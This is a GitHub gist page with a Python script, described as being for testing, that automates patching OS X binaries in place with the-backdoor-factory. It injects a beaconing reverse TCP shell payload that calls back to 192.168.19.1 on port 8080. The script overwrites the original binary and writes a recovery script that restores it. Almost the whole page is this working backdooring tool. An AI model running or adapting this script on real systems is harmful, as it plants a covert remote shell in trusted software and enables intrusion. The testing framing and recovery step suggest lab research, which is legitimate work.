Skip to content

Instantly share code, notes, and snippets.

@secretsquirrel

secretsquirrel/beaconing_automate_testing.py

Created February 5, 2015 14:08
Show Gist options
  • Save secretsquirrel/f84d99284faac9205ac4 to your computer and use it in GitHub Desktop.
Save secretsquirrel/f84d99284faac9205ac4 to your computer and use it in GitHub Desktop.
Download ZIP
Script to automate the patching of binaries on OS X for testing purposes (beaconing reverse tcp payload)
Raw
beaconing_automate_testing.py
#!/usr/bin/env python
import sys
import os
import shutil
import time
if os.uname()[1] == 'HostName': # Change This TO YOUR MASTER HOST
print 'NOPE NOPE NOPE'
sys.exit()
if len(sys.argv) != 2:
print "Usage: ", sys.argv[0], "FILE_TO_PATCH"
sys.exit()
if os.getuid() != 0:
print "Run as root"
sys.exit()
os.chdir("/Users/test/the-backdoor-factory")
shutil.copy(str(sys.argv[1]), ".")
cmdToRun = "./backdoor.py -f " + str(os.path.basename(str(sys.argv[1]))) + " -s beaconing_reverse_shell_tcp -P 8080 -H 192.168.19.1 -q -F ALL"
print cmdToRun
os.system(cmdToRun)
time.sleep(1)
copycmd = "backdoored/" + os.path.basename(str(sys.argv[1]))
print "Copying:", copycmd, 'to:', str(sys.argv[1])
time.sleep(2)
shutil.copy(copycmd, str(sys.argv[1]))
with open('recovery.sh', 'w') as f:
recover_cmd = '#!/bin/bash\n' + '../knockknock/knockknock.py\n'
recover_cmd += 'cp ' + os.path.basename(str(sys.argv[1])) + ' ' + str(sys.argv[1]) + '\ncodesign --verify -v ' + str(sys.argv[1]) + '\n'
f.write(recover_cmd)
os.system('chmod +x recovery.sh')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment